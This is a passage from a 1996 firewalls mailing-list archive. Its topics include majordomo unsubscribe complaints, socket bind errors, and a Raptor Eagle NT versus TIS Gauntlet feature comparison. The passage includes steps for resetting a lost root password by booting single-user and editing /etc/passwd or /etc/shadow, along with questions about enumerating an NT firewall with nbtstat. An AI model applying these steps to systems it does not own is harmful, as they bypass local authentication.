pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > e) edit to /etc/passwd file and remove the root password SYNC or UMOUNT THE DISK !!!!!!!!!!!!!!!!!!!! > f) turn off the power or halt From firewalls-owner Thu Jul 18 11:34:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA13815 for firewalls-outgoing; Thu, 18 Jul 1996 10:44:22 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA13776 for ; Thu, 18 Jul 1996 10:44:09 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id MAA05813; Thu, 18 Jul 1996 12:41:06 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id KAA13411; Thu, 18 Jul 1996 10:27:28 -0500 Received: by sonic.nmti.com; id AA18101; Thu, 18 Jul 1996 10:27:27 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607181527.AA18101@sonic.nmti.com.nmti.com> Subject: Re: More hacker info from Forbes To: michael@memra.com (Michael Dillon) Date: Thu, 18 Jul 1996 10:27:26 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Michael Dillon" at Jul 17, 96 09:14:00 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > http://www.forbes.com/asap/6396/hack.htm Take it with a grain of salt, tho'. I can just picture these uberhacker guys laying it on thick with these stiff suits from Forbes... From firewalls-owner Thu Jul 18 11:57:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA13870 for firewalls-outgoing; Thu, 18 Jul 1996 10:44:51 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA13833; Thu, 18 Jul 1996 10:44:28 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id MAA05831; Thu, 18 Jul 1996 12:41:13 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id KAA13758; Thu, 18 Jul 1996 10:35:05 -0500 Received: by sonic.nmti.com; id AA18416; Thu, 18 Jul 1996 10:35:04 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607181535.AA18416@sonic.nmti.com.nmti.com> Subject: Re: RC4-128bit encryption for Netscape available To: gary@habanero.jmu.edu (gary flynn) Date: Thu, 18 Jul 1996 10:35:04 -0500 (CDT) Cc: dufresne@winternet.com, firewalls-owner@GreatCircle.COM In-Reply-To: <199607181229.FAA17254@miles.greatcircle.com> from "gary flynn" at Jul 18, 96 08:25:21 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Either the government is even more technologically inept than I thought, > or Netscape really pulled one over on them. There's no way this provides > any control over the code. Whats to stop someone in-country from putting > up a gateway You mean, like any open CERN server with proxies turned on? From firewalls-owner Thu Jul 18 15:03:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA04023 for firewalls-outgoing; Thu, 18 Jul 1996 14:58:06 -0700 (PDT) Received: from net2.netacc.net (net2.netacc.net [206.28.142.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA04006; Thu, 18 Jul 1996 14:57:59 -0700 (PDT) Received: from localhost (bastian@localhost) by net2.netacc.net (8.7.5/8.7.3) with SMTP id RAA04657; Thu, 18 Jul 1996 17:53:04 -0400 (EDT) Date: Thu, 18 Jul 1996 17:53:04 -0400 (EDT) From: Bastian To: firewalls@greatcircle.com cc: firewalls-owner@greatcircle.com, firewalls-admin@greatcircle.com Subject: Hey! Admin! List owner! Yeah, YOU! (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk IS IT THAT HARD?! -- The One and Only |> bastian@mail.netacc.net |>astian http://net2.netacc.net/~bastian/ Vampyres' World... A Shared Reality. ---------- Forwarded message ---------- Date: Wed, 17 Jul 1996 18:43:14 -0400 (EDT) From: Bastian To: firewalls@greatcircle.com Subject: Hey! Admin! List owner! Yeah, YOU! Sent mail to majordomo@greatcircle.com. It ignored my unsubscribe request. Send mail to firewalls-owner@greatcircle.com. Was told to go back to majordomo@greatcircle.com. Jerked the majordomo account off again, GOT the fucking mail that PROVED it was broken, FORWARDED it to firewalls-owner@greatcircle.com, was ignore, AM STILL SUBSCRIBED. HOW HARD IS IT?! HELLO?! -- The One and Only |> bastian@mail.netacc.net |>astian http://net2.netacc.net/~bastian/ Vampyres' World... A Shared Reality. From firewalls-owner Thu Jul 18 15:36:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA05535 for firewalls-outgoing; Thu, 18 Jul 1996 15:24:05 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA05519 for ; Thu, 18 Jul 1996 15:23:55 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id RAA02279; Thu, 18 Jul 1996 17:20:52 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id OAA22639; Thu, 18 Jul 1996 14:13:52 -0500 Received: by sonic.nmti.com; id AA13799; Thu, 18 Jul 1996 14:13:51 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607181913.AA13799@sonic.nmti.com.nmti.com> Subject: Re: bind address already in use To: zwobada@apogee-com.fr (Jean-Francois Zwobada) Date: Thu, 18 Jul 1996 14:13:51 -0500 (CDT) Cc: raf@ezunx.com, firewalls@GreatCircle.COM In-Reply-To: <31EE6F79.A4D@apogee-com.fr> from "Jean-Francois Zwobada" at Jul 18, 96 07:08:09 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > When you strongly kill a process, it happens the process don't close a > file descriptor correctly. Um, I hope not. Every file descriptor associated with a process is closed on exit, and signal delivery goes through exit1() when it kills a process... hmmm... kern_exit.c: /* * Close open files and release open-file table. * This may block! */ fdfree(p); This grovels through all the files opened by the process and calls closef() on each one. And in kern_descrip.c the close() system call just checks to see if it should call munmapfd(), unthreads the fd off the proc structure, and calls closef(). exit1() takes care of unmapping the memory elsewhere. Doesn't look like it can happen that way... are you thinking of what happens to an open connection if the other end becomes unreadchable and you have SO_KEEPALIVE on the socket? From firewalls-owner Thu Jul 18 18:24:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA10920 for firewalls-outgoing; Thu, 18 Jul 1996 17:28:41 -0700 (PDT) Received: from net2.netacc.net (net2.netacc.net [206.28.142.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id RAA10913 for ; Thu, 18 Jul 1996 17:28:36 -0700 (PDT) Received: from localhost (bastian@localhost) by net2.netacc.net (8.7.5/8.7.3) with SMTP id UAA07827 for ; Thu, 18 Jul 1996 20:23:45 -0400 (EDT) Date: Thu, 18 Jul 1996 20:23:45 -0400 (EDT) From: Bastian To: firewalls@greatcircle.com Subject: Re: Hey! Admin! List owner! Yeah, YOU! (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ye gods, somebody who reads the message before flaming. Amazing. See? It just doesn't *respond*. I'm sending out a forward of my talk w/ the majordomo crapper there, you're all hackers, you should know what's wrong. Logical? Logical. QED. And since sending majordomo doesn't work, and sending firewalls-owner WAS IGNORED, I figured I might as well send to the list. Ja? Ja. Good. "Save your self-serving pity for the next Republican Convention." -- The One and Only |> bastian@mail.netacc.net |>astian http://net2.netacc.net/~bastian/ Vampyres' World... A Shared Reality. From firewalls-owner Thu Jul 18 18:24:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA11724 for firewalls-outgoing; Thu, 18 Jul 1996 17:41:29 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id RAA11664 for firewalls@greatcircle.com; Thu, 18 Jul 1996 17:40:22 -0700 (PDT) Received: from sam.networx.ie (dublin-ts3-94.indigo.ie [194.125.133.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA18120 for ; Wed, 17 Jul 1996 04:28:27 -0700 (PDT) Received: from mip1.networx.ie (mip1.networx.ie [194.9.12.1]) X-Organisation: I.T. NetworX Ltd X-Business: Network Consultancy and Training X-Address: 67 Merrion Square, Dublin 2, Ireland X-Voice: +353-1-676-8866 X-Fax: +353-1-676-8868 Received: from mike.networx.ie by mip1.networx.ie Date: Wed, 17 Jul 1996 08:40:32 BST From: Michael Ryan Reply-To: mike@NetworX.ie Subject: Re: 'ntsecurity' list ref To: "Norton, Dave" Cc: Firewalls-post Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I did it as you describe, on July 11th, and it worked for me. Of course, those square brackets mustn't be present and your email shouldn't contain spaces ;-) On Tue, 16 Jul 96 13:54:00 PDT Norton, Dave wrote: > Just lately, someone instructed that sending: > subscribe ntsecurity [your mailbox@whatever] > to: > majordomo@iss.net > gets one on the list... Cool... Real normal... But it doesn't work... Mike --- From firewalls-owner Thu Jul 18 18:25:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA11758 for firewalls-outgoing; Thu, 18 Jul 1996 17:41:52 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id RAA11678 for firewalls@greatcircle.com; Thu, 18 Jul 1996 17:40:29 -0700 (PDT) Received: from dsacg1.dsac.dla.mil (dsacg1.dsac.dla.mil [131.78.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA19628 for ; Wed, 17 Jul 1996 05:10:19 -0700 (PDT) Received: by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1)) From: nto2584@dsacg1.dsac.dla.mil (Steven C. Payne) Message-Id: <9607171206.AA09090@dsacg1.dsac.dla.mil> Subject: Re: Need some help. To: tjlow@pl.jaring.my (Low Taek Jho) (Low Taek Jho) Date: Wed, 17 Jul 96 8:06:55 EDT Cc: firewalls@greatcircle.com In-Reply-To: <199607161355.VAA19736@relay2.jaring.my>; from "Low Taek Jho" at Jul 16, 96 9:53 pm Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk First off, let me reply by saying this is not the place to ask this question. Second, by looking at your header, it seems you are using pop3 protocol, so ANYTHING anyone tells you to use as a standard /bin/sh user won't work. ie .forward, or mail_to_shell_script, etc. (.forward would work, but you need to login to the unix box and most likely you don't have a shell account, (I don't allow it). (BTW mailing to a shell script is not a good idea from sendmail) I would suggest you speak/mail to the administrators and explain the problem, that's why they are there, they do ADMIN stuff. nuff said. spayne ********************tear here >From firewalls-owner@GreatCircle.COM Tue Jul 16 11:07:15 1996 Received: from relay4.UU.NET by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1)) id AA29917; Tue, 16 Jul 1996 11:07:07 -0400 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP (peer crosschecked as: miles.greatcircle.com [198.102.244.34]) id QQaypw03486; Tue, 16 Jul 1996 11:01:06 -0400 (EDT) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA17439 for firewalls-outgoing; Tue, 16 Jul 1996 06:59:34 -0700 (PDT) Received: from relay2.jaring.my (relay2.jaring.my [192.228.128.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA17422 for ; Tue, 16 Jul 1996 06:59:24 -0700 (PDT) Received: from j14.glg53.jaring.my (j14.glg53.jaring.my [161.142.227.220]) by relay2.jaring.my (8.6.13/8.6.12) with SMTP id VAA19736; Tue, 16 Jul 1996 21:55:54 +0800 Message-Id: <199607161355.VAA19736@relay2.jaring.my> X-Sender: tjlow@pop2.jaring.my X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 16 Jul 1996 21:53:43 +0100 To: cmcurtin@megasoft.com, firewalls From: tjlow@pl.jaring.my (Low Taek Jho) Subject: Need some help. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status: RO Yo, OK, I'm going on holiday in Aug. And I know that all my mails will fill up my mailbox and go beyond 4 MB which is my limit on my server. I called up the server and they said that they couldn't do anything to increase to space. Any ideas how I could let the mails keep on comming in without my server deleting it? thanks./. By, Jho. From firewalls-owner Thu Jul 18 18:36:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA11710 for firewalls-outgoing; Thu, 18 Jul 1996 17:40:36 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id RAA11652 for firewalls@greatcircle.com; Thu, 18 Jul 1996 17:40:16 -0700 (PDT) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id RAA28534 for ; Tue, 16 Jul 1996 17:26:27 -0700 (PDT) Received: by hidata.com; id AA04885; Tue, 16 Jul 96 17:23:21 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Tue, 16 Jul 1996 17:22:58 -0700 Message-Id: <199607170022.RAA19877@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable To: Firewalls@GreatCircle.COM From: Bill Stout Subject: Re: Sidewinder Versus EagleRaptor Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I believe that NT will become the 'King O.S.' in a few years, and as=20 more bugs are found/fixed in the unpublished source, it may even=20 become secure. However (I have) both security and functionality=20 requirements for a Firewall that Eagle NT/NT does not (yet) meet. =20 Eventually it will be capable of supporting security conscious sites. Read on if you like apple to oranges comparisons. ... At 04:40 PM 7/16/96 -0500, you wrote: >TIS on Unix and Eagle on NT are different animals. Just wanted to be clear on that. Different products for different applications, and market segments. =20 Firewall professionals currently use UNIX. Period. Small office=20 environments with low security requirements, little functionality=20 and having low technical skills would use current NT solutions. =20 A nice job if you can get it, but an easy environment to hack into. =20 The documentation for Eagle NT says nothing about not being a domain member(dangerous), only about not being an NT PDC or BDC. Breaking into a LAN shouldn't allow you to break into/log into a Firewall. BTW, does; 'C:\ nbtstat -a 204.7.243.x' on an internet PC return=20 users/processes on a Eagle NT system? =20 Can NT 4.0b1 browse all files on a Eagle NT system with 3.51 and sp3? =20 Can you run a webbrowser on an Eagle NT system and browse your Firewalls'=20 registry at http://dev1.ora.com/andcgi/wregcgi.exe? Don't know? >...Sendmail is too buggy to even suggest >running it on your firewall (even if one claims to have fixed all the bugs >in the quarter million lines of code). =20 Nope, firewalls typically don't have sendmail connections on the outside. = =20 But as a mail relay host sendmail is required on the inside. Sendmail=20 itself isn't buggy. A non-sendmail knowledgeable administrator will=20 blame sendmail for his e-mail errors. >That is why we developed the SMTP >proxy. It doesn't just patch things through. It filters out >unsafe/unnecessary SMTP commands and it also looks for and prevents the >buffer overrun addressing attack.=20 The presence of an SMTP mail relay host is a requirement for any company which wants to send mail via the Internet. A small office may get away with using a SMTP Gateway, but I believe that the SMTPd proxy entry in=20 proxy.cmd only allows a single host entry for SMTP. Gateways also strip fields from messages, akin to crumpling and unfolding a letter each time=20 it passes through a gateway. A full SMTP command set is also required for=20 a site making full use of SMTP. =20 >...Also, the sendmail server on the firewall >would slow down the overall performance due to hitting the disk. Our >philosophy is to try and never touch the disk. This philosophy seems to >have worked since we tested out to be the fastest firewall tested in the >DataComm performance testing. No brainer there. Of course removing functions lower overhead. The less your firewall does, the faster it is at doing nothing. (Chuckle) Now just think if you could program it all in a VLSI chip set. Pretty soon the thing would be as fast and secure as a router. ;) >> =B7 rlogin >> =B7 rsh >> =B7 X-11 >> =B7 Finger >These have been documented everywhere as things you just don't enable. >That's why we disable them. Our GSP can generally handle the passage of >them. Does the TIS proxy support for this do more than just pass them >through? Creating a completely separate proxy is not real useful unless it >is doing something intelligent like filtering out commands or data that are >considered unsafe or opening and closing ports dynamically or performing >user authentication. Nope. Using Gauntlet as an example, rlogin is authenticatable. Rsh is not. = =20 However these proxies are directionally knowledgeable and are always(?!?)=20 used only in outgoing situations, never incoming. If you have ever worked^H^H administered in a development company, you know= =20 how precious some of these applications are to the developers. >> =B7 Printer >> =B7 POP3 >Our GSP would handle these. Not sure what a new proxy would do to secure >them any further. A proxy would allow one to make outgoing connections to remote printers (vs. faxing) or in from the internet for remote users to connect to the mail= server. >> =B7 Administrative GUI >(info-gw) >> >A proxy for a admin GUI? I guess you might say we support this in that our >current beta release of EagleNT supports the "remote management" feature of >the firewall that we have in our Unix version. =20 The 'Hawk' administration tool only runs on the firewall locally. There is no remote management in the current version of Eagle NT. =20 >It uses an encrypted >connection back to the firewall. I understand from the LAN/Times article, >assuming it is correct, that the most critical functions of the TIS cannot >be done from the GUI - not true for our GUI, remote or otherwise. TIS does need to do work on their GUI. Must not be many webmasters in=20 Virginia. >>Non-proxied service for NNTP, Whois, Real Audio, quotd, >>(unauthenticated, directionally savvy port 'service(s)'): >> >> =B7 Proxyd =B7 plug-gw >> >>Eagle also includes 'Generic pass-through', an unauthenticated,=20 >>directionally clueless open port 'service'. Must be the only=20 >>'real way' to punch a hole in your firewall. >> >Actually the GSP is direction aware and must also be allowed by a rule >(which can authorize based on src/dst, and time of day. =20 Nope. You're confusing your Proxyd with your GSP. I hate when that= happens. >...Mainly because most services that it >passes are not authentication aware like NTP, NNTP, POP3, etc. If its an >interactive service, then you could probably use our TELNET proxy= configured >via "Custom Telnet" which allows you to telnet to a port other than 23 and >would support authentication. That's what your Proxyd is for. >>Authentication methods supported: >> >> Eagle NT Gauntlet >> =B7 S/Key =B7 S/Key >> . Password list =B7 Enigma Logistics devices >> =B7 SecureID (Security= Dynamics) >> =B7 SecurNet (Digital= Pathways) >> =B7 CryptoCard >> =B7 DigiPass >> >As noted before, at the time of the NT port, SecureID did not have support >for NT clients. I noticed that Cryptocard does support NT now, not sure if >that was true at the time of our port. Digital Pathways just announced >support for NT in March, I would assume it wasn't really production= shipping >until a little later. Bottom line, our Unix port supports most of the= above >except DigiPass and Enigma. The EagleNT version will roll in the others as >the vendors support an NT version of their client code (actually a few >months later due to development and test time). > >I would add a few more items to your list (and I will use the current beta >version of our EagleNT) to compare against and I don't know the answer for >TIS on some of these and have just guessed: > > Eagle >TIS > >NT version of F/W Yes >No >(The last I talked to TIS, they did not have an NT port. Another vendor >offers a port of TIS on NT, but do not know how it compares to the Unix >version). I breathlessly await the day TIS ships an NT Gauntlet package. I also breathlessly await public NT source code from Microsoft. Nah, I think I'll start breathing now... >DNS Proxy Yes >No >(This is the ability to create a split/dual-level DNS on one system. We >have found that a very significant portion of customer support is related= to >debugging someone else's DNS environment. The DNS proxy allows a customer >to create the public/private DNS desired, but with one server running on= the >firewall and with a simpler syntax for the database files). > >Automatic OS Hardening Yes >Not sure >(Our software auto-installs and turns off all networking services, disables >all user accounts other than administrator/root and turns off IPX and >NetBui. It also installs IP level code to perform anti-spoof and >anti-source route code. I would guess that the TIS package does not >automatically do all this - if it does, great stuff.) Yup. Gauntlet does grind through the O.S. and finds stupid mistakes or= other things it doesn't like. Compliments of Marcus Ranum, I believe. However=20 I do dislike Gauntlet expecting a local compiler. >Continuous Integrity Check Yes >Yes >(Where we automatically and continuous checksum our executables (MD-5), >continuously check for unauthorized services and continuously disable IP >forwarding/routing.) =20 > >SNMP Traps on logging Yes >Not sure >(We can notify a central network management station via an SNMP trap for >some or all of the log entries.) > >Suspicious Activity Monitoring Yes >No >(We continuously monitor the firewall for suspicious activity and create >alerts and also perform automatic traceroutes back to the source of the >suspicious activity). Gauntlet does send e-mail to the admin containing security alerts. Any firewall that logs permitted access, and reports denied access can be reguarded as having 'continuous suspicious activity monitoring'. What=20 makes Eagle NT different is the ability to log additional entries in the logfile which meet user-defined thresholds. The value of these are=20 debateable, since user access varies greatly day-by-day. >DEC Alpha NT Support Yes >No That's moot, since both packages support different platforms, except Intel. = =20 Pentium Pros are now very close to Alpha system performance. >TIS is a good firewall. They wouldn't be in business if it wasn't. The >main difference noted in LanTimes is that Raptor is, as a whole, much= easier >to install and maintain verses a TIS installation. We also directly= support >the NT port, TIS doesn't (the last time I checked). > >Best regards, > >Dale > =20 >=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > Dale Lancaster Web: www.raptor.com > > Raptor Systems "The Eagle of Firewalls" > dlancaster@raptor.com =09 > (214) 423-6212 Eagle - LanTimes "Best of Times" Honor - July 1996 >=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D > > > <=3D=3D=3D=3D=3D=3D=3D10=3D=3D=3D=3D=3D=3D=3D=3D20=3D=3D=3D=3D=3D=3D=3D=3D30= =3D=3D=3D=3D=3D=3D=3D=3D40=3D=3D=3D=3D=3D=3D=3D=3D50=3D=3D=3D=3D=3D=3D=3D=3D= 60=3D=3D=3D=3D=3D=3D=3D=3D70=3D=3D=3D=3D=3D=3D=3D=3D80 William B. Stout | Major revelations: Senior Systems Admin | "All objects are part of a larger object." Hitachi Data Systems | "3 aware beings comprise a person; mind, body,= spirit." NT/UNIX/I-net/Routers | "The secret of life: To be involved with= 'creation'." 408-970-4822 | Infowar, Cyber-war, yes, 'they' are out to get= you... ----------------------------------------------------------------------------= ---- From firewalls-owner Thu Jul 18 20:33:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA24539 for firewalls-outgoing; Thu, 18 Jul 1996 20:18:36 -0700 (PDT) Received: from net2.netacc.net (net2.netacc.net [206.28.142.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id UAA24517 for ; Thu, 18 Jul 1996 20:18:28 -0700 (PDT) Received: from localhost (bastian@localhost) by net2.netacc.net (8.7.5/8.7.3) with SMTP id XAA12292 for ; Thu, 18 Jul 1996 23:13:32 -0400 (EDT) Date: Thu, 18 Jul 1996 23:13:32 -0400 (EDT) From: Bastian To: firewalls@greatcircle.com Subject: Majordomo results: Re: Majordomo results: ... (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk See? It just ignores the command. Ja? Ja. Bastian@mail.netacc.net is the correct one, btw. >>>> which bastian The string 'bastian' appears in the following entries in lists served by Majordomo@GreatCircle.COM: List Address ==== ======= firewalls dnadan@thn.htu.se (Johann Sebastian Bach) firewalls bastian@mail.netacc.net majordomo-announce Sebastian Masso >>>> unsubscribe firewalls **** unsubscribe: 'bastian@net2.netacc.net' is not a member of list 'firewalls'. **** contact "firewalls-approval" if you need help. >>>> unsubscribe firewalls bastian@net2.netacc.net **** unsubscribe: 'bastian@net2.netacc.net' is not a member of list 'firewalls'. **** contact "firewalls-approval" if you need help. >>>> unsubscribe firewalls bastian@mail.netacc.net >>>> unsubscribe firewalls bastian@bastian.netacc.net **** unsubscribe: 'bastian@bastian.netacc.net' is not a member of list 'firewalls'. **** contact "firewalls-approval" if you need help. >>>> end END OF COMMANDS From firewalls-owner Fri Jul 19 00:03:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA01529 for firewalls-outgoing; Thu, 18 Jul 1996 23:50:31 -0700 (PDT) Received: from dtcro002.apogee-com.fr (firewall.apogee-com.fr [194.2.187.130]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id XAA01522 for ; Thu, 18 Jul 1996 23:50:24 -0700 (PDT) Received: by dtcro002.apogee-com.fr; id IAA25964; Fri, 19 Jul 1996 08:45:05 +0200 (MET DST) Received: from dtcxs001.apogee-com.fr(10.129.16.1) by firewall.apogee-com.fr via smap (V3.1.1) Received: from LCHE.apogee-com.fr (ingpc003.apogee-com.fr) by dtcxs001.apogee-com.fr (4.1/SMI-4.1) Message-Id: <31EF2E96.710C@apogee-com.fr> Date: Fri, 19 Jul 1996 08:43:34 +0200 From: Jean-Francois Zwobada Organization: APOGEE Communications X-Mailer: Mozilla 2.02 (Win95; I) Mime-Version: 1.0 To: Peter da Silva Cc: raf@ezunx.com, firewalls@GreatCircle.COM Subject: Re: bind address already in use References: <9607181913.AA13799@sonic.nmti.com.nmti.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Well, it happens to me on a SunOS machine with one of the worst code I ever done... Which OS your kern_exit.c code comes from ? JF -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Orsay Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________ From firewalls-owner Fri Jul 19 00:18:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA01727 for firewalls-outgoing; Thu, 18 Jul 1996 23:57:25 -0700 (PDT) Received: from iii.org.tw ([140.92.66.45]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id XAA01719 for ; Thu, 18 Jul 1996 23:57:19 -0700 (PDT) Received: from venus ([140.92.61.135]) by iii.org.tw (4.1/SMI-4.1) Date: Fri, 19 Jul 96 14:55:34 CST Message-Id: <9607190655.AA12902@iii.org.tw> X-Sender: chfeng@iiidns.iii.org.tw X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: raf From: Chih-hung Feng Subject: Re: bind address already in use Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:02 PM 7/18/96 -0700, you wrote: >I know I have seen this before, in regards to INETD and use >of TCP wrappers, what would cause the errors in bind??? > >We are getting strange errors since putting in tcpd and connections >are not quite working. The weird this is, we pulled tcpd out and >are still getting the same error. > >this is on solaris 2.4 > It never occurred to me before. However, could it be due to the MSL TIME_WAIT of the original server? (be it tcpd or inetd) When a process does an active close, it enters a state called MSL (maximum segment lifetime, if my memory serves) TIME_WAIT, it would remain in this state for a period of 2 MSL (it depends on implementation, usually a few minutes). If a new process tries to bind the original port using the same sockaddr info, it gets an address-in-use error. If the messages in your system were generated for this reason, try not to kill the inetd process next time, just send a HUP signal should be OK. Regards -- Chih-hung Feng Information Security Team, Institute for Information Industry From firewalls-owner Fri Jul 19 01:23:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA05472 for firewalls-outgoing; Fri, 19 Jul 1996 01:03:24 -0700 (PDT) Received: from sam.networx.ie (dublin-ts12-238.indigo.ie [194.125.133.238]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id BAA05451 for ; Fri, 19 Jul 1996 01:03:14 -0700 (PDT) Received: from mip1.networx.ie (mip1.networx.ie [194.9.12.1]) X-Organisation: I.T. NetworX Ltd X-Business: Network Consultancy and Training X-Address: 67 Merrion Square, Dublin 2, Ireland X-Voice: +353-1-676-8866 X-Fax: +353-1-676-8868 Received: from mike.networx.ie by mip1.networx.ie Date: Thu, 18 Jul 1996 16:54:06 BST From: Michael Ryan Reply-To: mike@NetworX.ie Subject: RE: [HELP] I lost root password! To: "Wojno, Jim" Cc: Firewalls Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If you have an account for yourself then do a single user boot from the CD, mount /etc from disk, edit /etc/shadow and copy your password into root's password field. Reboot off the disk. Change root's password in the normal way. This way, 